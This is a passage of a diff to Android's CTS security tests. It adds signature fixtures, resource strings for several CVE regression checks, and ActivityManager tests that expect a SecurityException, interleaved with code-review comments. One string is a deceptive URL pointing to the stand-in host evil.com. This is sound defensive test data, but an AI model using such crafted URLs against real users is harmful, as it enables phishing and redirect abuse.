+++ b/tests/tests/security/res/raw/sig_com_android_cellbroadcast.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_compos.bin b/tests/tests/security/res/raw/sig_com_android_compos.bin
new file mode 100644
index 0000000..d4ba69a
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_compos.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_connectivity_resources.bin b/tests/tests/security/res/raw/sig_com_android_connectivity_resources.bin
new file mode 100644
index 0000000..e89a552
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_connectivity_resources.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_extservices.bin b/tests/tests/security/res/raw/sig_com_android_extservices.bin
new file mode 100644
index 0000000..790edbb
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_extservices.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_geotz.bin b/tests/tests/security/res/raw/sig_com_android_geotz.bin
new file mode 100644
index 0000000..aa9479a
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_geotz.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_hardware_core_permissions.bin b/tests/tests/security/res/raw/sig_com_android_hardware_core_permissions.bin
new file mode 100644
index 0000000..1ac04ee
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_hardware_core_permissions.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_hardware_power.bin b/tests/tests/security/res/raw/sig_com_android_hardware_power.bin
new file mode 100644
index 0000000..7db8788
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_hardware_power.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_hardware_sensors.bin b/tests/tests/security/res/raw/sig_com_android_hardware_sensors.bin
new file mode 100644
index 0000000..c3f2e2e
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_hardware_sensors.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_hardware_thermal.bin b/tests/tests/security/res/raw/sig_com_android_hardware_thermal.bin
new file mode 100644
index 0000000..03b7c44
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_hardware_thermal.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_hardware_usb.bin b/tests/tests/security/res/raw/sig_com_android_hardware_usb.bin
new file mode 100644
index 0000000..7a892d8
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_hardware_usb.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_hardware_vibrator.bin b/tests/tests/security/res/raw/sig_com_android_hardware_vibrator.bin
new file mode 100644
index 0000000..d331763
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_hardware_vibrator.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_hardware_wifi.bin b/tests/tests/security/res/raw/sig_com_android_hardware_wifi.bin
new file mode 100644
index 0000000..9b0f190
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_hardware_wifi.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_hotspot2_osulogin.bin b/tests/tests/security/res/raw/sig_com_android_hotspot2_osulogin.bin
new file mode 100644
index 0000000..2bb4b5a
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_hotspot2_osulogin.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_i18n.bin b/tests/tests/security/res/raw/sig_com_android_i18n.bin
new file mode 100644
index 0000000..6bcf8ec
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_i18n.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_ipsec.bin b/tests/tests/security/res/raw/sig_com_android_ipsec.bin
new file mode 100644
index 0000000..319484a
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_ipsec.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_mediaprovider.bin b/tests/tests/security/res/raw/sig_com_android_mediaprovider.bin
new file mode 100644
index 0000000..c87618f
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_mediaprovider.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_neuralnetworks.bin b/tests/tests/security/res/raw/sig_com_android_neuralnetworks.bin
new file mode 100644
index 0000000..05cb7b9
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_neuralnetworks.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_os_statsd.bin b/tests/tests/security/res/raw/sig_com_android_os_statsd.bin
new file mode 100644
index 0000000..ed8693b
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_os_statsd.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_permission.bin b/tests/tests/security/res/raw/sig_com_android_permission.bin
new file mode 100644
index 0000000..e9e5a69
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_permission.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_rkpd.bin b/tests/tests/security/res/raw/sig_com_android_rkpd.bin
new file mode 100644
index 0000000..c49bfd0
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_rkpd.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_runtime.bin b/tests/tests/security/res/raw/sig_com_android_runtime.bin
new file mode 100644
index 0000000..e59f0f3
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_runtime.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_safetycenter_resources.bin b/tests/tests/security/res/raw/sig_com_android_safetycenter_resources.bin
new file mode 100644
index 0000000..d9f97a4
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_safetycenter_resources.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_sdkext.bin b/tests/tests/security/res/raw/sig_com_android_sdkext.bin
new file mode 100644
index 0000000..26a9b92
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_sdkext.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_uwb.bin b/tests/tests/security/res/raw/sig_com_android_uwb.bin
new file mode 100644
index 0000000..1118522
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_uwb.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_uwb_resources.bin b/tests/tests/security/res/raw/sig_com_android_uwb_resources.bin
new file mode 100644
index 0000000..55f326c
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_uwb_resources.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_vibrator_drv2624.bin b/tests/tests/security/res/raw/sig_com_android_vibrator_drv2624.bin
new file mode 100644
index 0000000..cd7e33c
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_vibrator_drv2624.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_vibrator_sunfish.bin b/tests/tests/security/res/raw/sig_com_android_vibrator_sunfish.bin
new file mode 100644
index 0000000..42e01d6
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_vibrator_sunfish.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_virt.bin b/tests/tests/security/res/raw/sig_com_android_virt.bin
new file mode 100644
index 0000000..89c91e3
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_virt.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_vndk.bin b/tests/tests/security/res/raw/sig_com_android_vndk.bin
new file mode 100644
index 0000000..e6b006b
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_vndk.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_wifi.bin b/tests/tests/security/res/raw/sig_com_android_wifi.bin
new file mode 100644
index 0000000..469ee37
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_wifi.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_wifi_dialog.bin b/tests/tests/security/res/raw/sig_com_android_wifi_dialog.bin
new file mode 100644
index 0000000..1fc37eb
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_wifi_dialog.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_wifi_resources.bin b/tests/tests/security/res/raw/sig_com_android_wifi_resources.bin
new file mode 100644
index 0000000..09016e0
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_wifi_resources.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_google_cf_apex.bin b/tests/tests/security/res/raw/sig_com_google_cf_apex.bin
new file mode 100644
index 0000000..f894bf6
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_google_cf_apex.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_google_emulated_camera_provider_hal.bin b/tests/tests/security/res/raw/sig_com_google_emulated_camera_provider_hal.bin
new file mode 100644
index 0000000..e011b62
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_google_emulated_camera_provider_hal.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_cts_appsearch_helper_cert_a.bin b/tests/tests/security/res/raw/sig_cts_appsearch_helper_cert_a.bin
new file mode 100644
index 0000000..af5d313
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_cts_appsearch_helper_cert_a.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_cts_appsearch_helper_cert_b.bin b/tests/tests/security/res/raw/sig_cts_appsearch_helper_cert_b.bin
new file mode 100644
index 0000000..d8fcc87
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_cts_appsearch_helper_cert_b.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_cts_appsearch_hosttest_helper_cert_a.bin b/tests/tests/security/res/raw/sig_cts_appsearch_hosttest_helper_cert_a.bin
new file mode 100644
index 0000000..c8c1806
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_cts_appsearch_hosttest_helper_cert_a.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_cts_appsearch_hosttest_helper_cert_b.bin b/tests/tests/security/res/raw/sig_cts_appsearch_hosttest_helper_cert_b.bin
new file mode 100644
index 0000000..802cbc0e
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_cts_appsearch_hosttest_helper_cert_b.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_cts_blob_helper_cert.bin b/tests/tests/security/res/raw/sig_cts_blob_helper_cert.bin
new file mode 100644
index 0000000..6e4c311
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_cts_blob_helper_cert.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_cts_blob_helper_cert2.bin b/tests/tests/security/res/raw/sig_cts_blob_helper_cert2.bin
new file mode 100644
index 0000000..35347a6
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_cts_blob_helper_cert2.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_cts_keyset_test_a.bin b/tests/tests/security/res/raw/sig_cts_keyset_test_a.bin
new file mode 100644
index 0000000..4d22159
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_cts_keyset_test_a.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_cts_keyset_test_b.bin b/tests/tests/security/res/raw/sig_cts_keyset_test_b.bin
new file mode 100644
index 0000000..dbeeefd
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_cts_keyset_test_b.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_cts_keyset_test_c.bin b/tests/tests/security/res/raw/sig_cts_keyset_test_c.bin
new file mode 100644
index 0000000..265ac9a
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_cts_keyset_test_c.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_cts_keyset_test_ec_a.bin b/tests/tests/security/res/raw/sig_cts_keyset_test_ec_a.bin
new file mode 100644
index 0000000..356a5ab
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_cts_keyset_test_ec_a.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_cts_net_app.bin b/tests/tests/security/res/raw/sig_cts_net_app.bin
new file mode 100644
index 0000000..ff683ed
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_cts_net_app.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_cts_testkey1.bin b/tests/tests/security/res/raw/sig_cts_testkey1.bin
new file mode 100644
index 0000000..ca90fe2
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_cts_testkey1.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_cts_testkey2.bin b/tests/tests/security/res/raw/sig_cts_testkey2.bin
new file mode 100644
index 0000000..4371c21
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_cts_testkey2.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_cts_uicc_2021.bin b/tests/tests/security/res/raw/sig_cts_uicc_2021.bin
new file mode 100644
index 0000000..7125291
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_cts_uicc_2021.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_ec_p256.bin b/tests/tests/security/res/raw/sig_ec_p256.bin
new file mode 100644
index 0000000..e611e3d
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_ec_p256.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_ec_p256_2.bin b/tests/tests/security/res/raw/sig_ec_p256_2.bin
new file mode 100644
index 0000000..7723bea
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_ec_p256_2.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_ec_p256_3.bin b/tests/tests/security/res/raw/sig_ec_p256_3.bin
new file mode 100644
index 0000000..cc82af9
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_ec_p256_3.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_ec_p256_4.bin b/tests/tests/security/res/raw/sig_ec_p256_4.bin
new file mode 100644
index 0000000..29980db
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_ec_p256_4.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_ec_p256_5.bin b/tests/tests/security/res/raw/sig_ec_p256_5.bin
new file mode 100644
index 0000000..e62d5bb
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_ec_p256_5.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_keyset_A.bin b/tests/tests/security/res/raw/sig_keyset_A.bin
new file mode 100644
index 0000000..e484ec3
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_keyset_A.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_keyset_B.bin b/tests/tests/security/res/raw/sig_keyset_B.bin
new file mode 100644
index 0000000..b95719c
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_keyset_B.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_rro_remounted_test_a.bin b/tests/tests/security/res/raw/sig_rro_remounted_test_a.bin
new file mode 100644
index 0000000..24d2d55
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_rro_remounted_test_a.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_rsa_2048.bin b/tests/tests/security/res/raw/sig_rsa_2048.bin
new file mode 100644
index 0000000..d61baef
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_rsa_2048.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_sdk_sandbox.bin b/tests/tests/security/res/raw/sig_sdk_sandbox.bin
new file mode 100644
index 0000000..3b01c2e
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_sdk_sandbox.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_security_cts_test_cert.bin b/tests/tests/security/res/raw/sig_security_cts_test_cert.bin
new file mode 100644
index 0000000..e62cbff
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_security_cts_test_cert.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_shell_as_test_app_key.bin b/tests/tests/security/res/raw/sig_shell_as_test_app_key.bin
new file mode 100644
index 0000000..be5aab5
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_shell_as_test_app_key.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_test_cert_1.bin b/tests/tests/security/res/raw/sig_test_cert_1.bin
new file mode 100644
index 0000000..e611e3d
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_test_cert_1.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_test_cert_2.bin b/tests/tests/security/res/raw/sig_test_cert_2.bin
new file mode 100644
index 0000000..7723bea
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_test_cert_2.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_test_cert_3.bin b/tests/tests/security/res/raw/sig_test_cert_3.bin
new file mode 100644
index 0000000..cc82af9
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_test_cert_3.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_test_cert_4.bin b/tests/tests/security/res/raw/sig_test_cert_4.bin
new file mode 100644
index 0000000..29980db
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_test_cert_4.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_testcert.bin b/tests/tests/security/res/raw/sig_testcert.bin
new file mode 100644
index 0000000..cae337e
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_testcert.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_unit_test.bin b/tests/tests/security/res/raw/sig_unit_test.bin
new file mode 100644
index 0000000..4dbbc49
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_unit_test.bin
Binary files differ
diff --git a/tests/tests/security/res/values/integers_CVE_2022_20429.xml b/tests/tests/security/res/values/integers_CVE_2022_20429.xml
new file mode 100644
index 0000000..a9d10ff
--- /dev/null
+++ b/tests/tests/security/res/values/integers_CVE_2022_20429.xml
@@ -0,0 +1,24 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<resources>
+ <integer name="cve_2022_20429_disable">2</integer>
+ <integer name="cve_2022_20429_enable">1</integer>
+ <integer name="cve_2022_20429_failure">-1</integer>
+ <integer name="cve_2022_20429_success">0</integer>
+ <integer name="cve_2022_20429_timeoutMs">20000</integer>
+</resources>
diff --git a/tests/tests/security/res/values/strings.xml b/tests/tests/security/res/values/strings.xml
index ee1f73e..3423f32 100644
--- a/tests/tests/security/res/values/strings.xml
+++ b/tests/tests/security/res/values/strings.xml
@@ -32,4 +32,31 @@
<string name="cve_2022_20338_invalidURL">https://google.com@evil.com</string>
<string name="cve_2022_20338_path">@evil.com</string>
<string name="cve_2022_20338_scheme">https</string>
+
+ <!-- CVE-2023-20960 -->
+ <string name="cve_2023_20960_dumpsysActivityCmd">dumpsys activity %1$s</string>
+ <string name="cve_2023_20960_failMsg">Device is vulnerable to b/250589026, Unexported
+ activities can be launched using ACTION_SETTINGS_EMBED_DEEP_LINK_ACTIVITY</string>
+ <string name="cve_2023_20960_forwardSlash">/</string>
+ <string name="cve_2023_20960_mResumedTruePattern">.*mResumed=true.*</string>
+ <string name="cve_2023_20960_settingsPackageName">com.android.settings</string>
+ <string name="cve_2023_20960_unexportedActivity">.security.InstallCaCertificateWarning</string>
+ <string name="cve_2023_20960_uriStringComponent">component=</string>
+ <string name="cve_2023_20960_uriStringIntent">intent:#Intent;</string>
+ <string name="cve_2023_20960_uriStringSuffix">;end</string>
+
+ <!-- CVE-2021-0600 -->
+ <string name="cve_2021_0600_action">CVE_2021_0600_action</string>
+ <string name="cve_2021_0600_errorCreateCharSeq">Failed to create a charsequence to contain HTML
+ text</string>
+ <string name="cve_2021_0600_failMsg">Vulnerable to b/179042963 !!</string>
+ <string name="cve_2021_0600_intentNotFound">Failed to resolve %1$s</string>
+ <string name="cve_2021_0600_keyException">exception</string>
+ <string name="cve_2021_0600_keyHtml">html</string>
+ <string name="cve_2021_0600_noException">noException</string>
+ <string name="cve_2021_0600_pattern">.*CVE_2021_0600_EXPN.*</string>
+ <string name="cve_2021_0600_patternNotFound">UI element with text pattern %1$s not found
+ </string>
+ <string name="cve_2021_0600_targetText">CVE_2021_0600_EXPN</string>
+ <string name="cve_2021_0600_targetTextHtml"><![CDATA[<h1>CVE_2021_0600_EXPN</h1>]]></string>
</resources>
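Review bot: The marker `CVE_2021_0600_EXPN` is written out three times, in `cve_2021_0600_pattern`, `cve_2021_0600_targetText` and `cve_2021_0600_targetTextHtml`, and nothing ties the copies together. If one is edited alone, the UI lookup presumably stops matching and the test reports `cve_2021_0600_patternNotFound` instead of a verdict on the device. Keeping only `cve_2021_0600_targetText` and deriving the regex and the HTML in the test code would remove that risk. At minimum, add `<!-- pattern, targetText and targetTextHtml must carry the same marker -->` above the three entries.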
diff --git a/tests/tests/security/res/values/strings_CVE_2022_20429.xml b/tests/tests/security/res/values/strings_CVE_2022_20429.xml
new file mode 100644
index 0000000..f515bcf
--- /dev/null
+++ b/tests/tests/security/res/values/strings_CVE_2022_20429.xml
@@ -0,0 +1,28 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<resources>
+ <string name="cve_2022_20429_allowButtonResKey">allow</string>
+ <string name="cve_2022_20429_broadcastAction">testBluetoothModeChangeBroadcastAction</string>
+ <string name="cve_2022_20429_btAction">btAction</string>
+ <string name="cve_2022_20429_carSettingsPackageName">com.android.car.settings</string>
+ <string name="cve_2022_20429_failMsg">Device is vulnerable to b/220741473!!</string>
+ <string name="cve_2022_20429_featureMissing">Skipping test: %1$s missing.</string>
+ <string name="cve_2022_20429_messageKey">message</string>
+ <string name="cve_2022_20429_resType">string</string>
+ <string name="cve_2022_20429_resultKey">result</string>
+</resources>
diff --git a/tests/tests/security/res/values/strings_CVE_2023_21143.xml b/tests/tests/security/res/values/strings_CVE_2023_21143.xml
new file mode 100644
index 0000000..cef10c7
--- /dev/null
+++ b/tests/tests/security/res/values/strings_CVE_2023_21143.xml
@@ -0,0 +1,27 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<resources>
+ <string name="channelId">notification_channel_id</string>
+ <string name="channelName">notification_channel_name</string>
+ <string name="failMsg">Device is vulnerable to b/268193777 !!</string>
+ <string name="noPidFound">No pid found for com.android.systemui</string>
+ <string name="notificationSendingFailed">notification has not been sent successfully</string>
+ <string name="notificationText">notification_text</string>
+ <string name="shellCommandForHome">input keyevent KEYCODE_HOME</string>
+ <string name="systemuiPidCommand">pidof com.android.systemui</string>
+</resources>
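Review bot: The names in this new file (`channelId`, `channelName`, `failMsg`, `noPidFound`, `notificationText` and the rest) have no CVE prefix, although they share the module-wide `res/values` namespace. The other files in this change prefix theirs (`cve_2022_20429_failMsg`, `cve_2021_0600_failMsg`, `cve_2023_20960_failMsg`). A generic name such as `failMsg` will clash with the next test that picks the same name, and duplicate definitions in one package are normally rejected when resources are compiled. Rename them along the lines of `<string name="cve_2023_21143_failMsg">` and update the references in the test source, which is outside this hunk.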
diff --git a/tests/tests/security/res/xml/device_admin_cve_2021_0600.xml b/tests/tests/security/res/xml/device_admin_cve_2021_0600.xml
new file mode 100644
index 0000000..2b7410c
--- /dev/null
+++ b/tests/tests/security/res/xml/device_admin_cve_2021_0600.xml
@@ -0,0 +1,20 @@
+<?xml version ="1.0" encoding ="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<device-admin>
+ <uses-policies />
+</device-admin>
diff --git a/tests/tests/security/src/android/security/cts/ActivityManagerTest.java b/tests/tests/security/src/android/security/cts/ActivityManagerTest.java
index b380472..880c5c6 100644
--- a/tests/tests/security/src/android/security/cts/ActivityManagerTest.java
+++ b/tests/tests/security/src/android/security/cts/ActivityManagerTest.java
@@ -258,6 +258,82 @@
assertNull(activity.mReceivedTransition);
}
+ @AsbSecurityTest(cveBugId = 286882367)
+ @Test
+ public void testActivityManager_rejectRemoteTransition() throws Exception {
+ Context targetContext = getInstrumentation().getTargetContext();
+ final Intent baseIntent = new Intent(targetContext, WaitEnterAnimActivity.class);
+ baseIntent.setFlags(FLAG_ACTIVITY_NO_USER_ACTION | FLAG_ACTIVITY_NEW_TASK);
+
+ final boolean[] remoteCalled = new boolean[]{false};
+ RemoteTransition someRemote = new RemoteTransition(new IRemoteTransition.Stub() {
+ @Override
+ public void startAnimation(IBinder token, TransitionInfo info,
+ SurfaceControl.Transaction t,
+ IRemoteTransitionFinishedCallback finishCallback) throws RemoteException {
+ remoteCalled[0] = true;
+ t.apply();
+ finishCallback.onTransitionFinished(null /* wct */, null /* sct */);
+ }
+
+ @Override
+ public void mergeAnimation(IBinder token, TransitionInfo info,
+ SurfaceControl.Transaction t, IBinder mergeTarget,
+ IRemoteTransitionFinishedCallback finishCallback) throws RemoteException {
+ remoteCalled[0] = true;
+ }
+ });
+ ActivityOptions opts = ActivityOptions.makeRemoteTransition(someRemote);
+
+ boolean securityException = false;
+ final WaitEnterAnimActivity baseActivity;
+ try {
+ baseActivity = (WaitEnterAnimActivity)
+ getInstrumentation().startActivitySync(baseIntent, opts.toBundle());
+ assertTrue(waitUntil(() -> baseActivity.mAnimComplete));
+ } catch (SecurityException se) {
+ securityException = true;
+ }
+
+ assertFalse(remoteCalled[0]);
+ assertTrue(securityException);
+ }
+
+ @AsbSecurityTest(cveBugId = 289549315)
+ @Test
+ public void testActivityManager_backupAgentCreated_rejectIfCallerUidNotEqualsPackageUid()
+ throws Exception {
+ SecurityException securityException = null;
+ Exception unexpectedException = null;
+ try {
+ final Object iam = ActivityManager.class.getDeclaredMethod("getService").invoke(null);
+ Class.forName("android.app.IActivityManager").getDeclaredMethod("backupAgentCreated",
+ String.class, IBinder.class, int.class)
+ .invoke(iam, /* agentPackageName*/ "android", /* agent */ null, /* userId */ 0);
+ } catch (SecurityException e) {
+ securityException = e;
+ } catch (InvocationTargetException e) {
+ if (e.getCause() instanceof SecurityException) {
+ securityException = (SecurityException) e.getCause();
+ } else {
+ unexpectedException = e;
+ }
+ } catch (Exception e) {
+ unexpectedException = e;
+ }
+ if (unexpectedException != null) {
+ Log.w("ActivityManagerTest", "Unexpected exception", unexpectedException);
+ fail("ActivityManagerNative.backupAgentCreated() API should have thrown "
+ + "SecurityException when invoked from process with uid not matching target "
+ + "package uid.");
+ }
+
+ assertNotNull("Expected SecurityException when caller's uid doesn't match package uid",
+ securityException);
+ assertEquals("android does not belong to uid " + Process.myUid(),
+ securityException.getMessage());
+ }
+
/**
* Run ActivityManager.getHistoricalProcessExitReasons once, return the time spent on it.
*/
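Review bot: In testActivityManager_backupAgentCreated_rejectIfCallerUidNotEqualsPackageUid, the `catch (Exception e)` branch sends a failed reflective lookup (for example a NoSuchMethodException if the hidden `backupAgentCreated` signature differs on the build under test) to `fail(...)`, whose message says the SecurityException was not thrown, so a harness problem would be reported as a vulnerable device. Reflection failures are better treated as inconclusive, e.g. `catch (ReflectiveOperationException e) { assumeNoException(e); }` placed after the InvocationTargetException branch; whether `assumeNoException` is already statically imported is not visible from this hunk. The closing `assertEquals` on the exact message text ties the verdict to wording rather than to the exception type; if that is deliberate, to pin the specific uid check, a short comment saying so would help. In testActivityManager_rejectRemoteTransition, `remoteCalled` is written in the binder callback and read by the test, so an `AtomicBoolean` would make the cross-thread visibility explicit.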
@@ -325,6 +401,15 @@
}
}
+ public static class WaitEnterAnimActivity extends Activity {
+ public boolean mAnimComplete = false;
+
+ @Override
+ public void onEnterAnimationComplete() {
+ mAnimComplete = true;
+ }
+ }
+
public static class ActivityOptionsActivity extends Activity {
public RemoteTransition mReceivedTransition = null;
public boolean mPreCreate = false;
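Review bot: `mAnimComplete` in WaitEnterAnimActivity is a plain field that is set in `onEnterAnimationComplete()` and polled by the test through `waitUntil(() -> baseActivity.mAnimComplete)`; these presumably run on different threads (activity callback versus instrumentation thread), so the poll has no visibility guarantee. Declaring it `public volatile boolean mAnimComplete = false;` makes the hand-off explicit. ActivityOptionsActivity, which follows as context, continues outside the hunk.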
diff --git a/tests/tests/security/src/android/security/cts/AutomaticZenRuleTests/AutomaticZenRuleTests.java b/tests/tests/security/src/android/security/cts/AutomaticZenRuleTests/AutomaticZenRuleTests.java
new file mode 100644
index 0000000..5579026
--- /dev/null
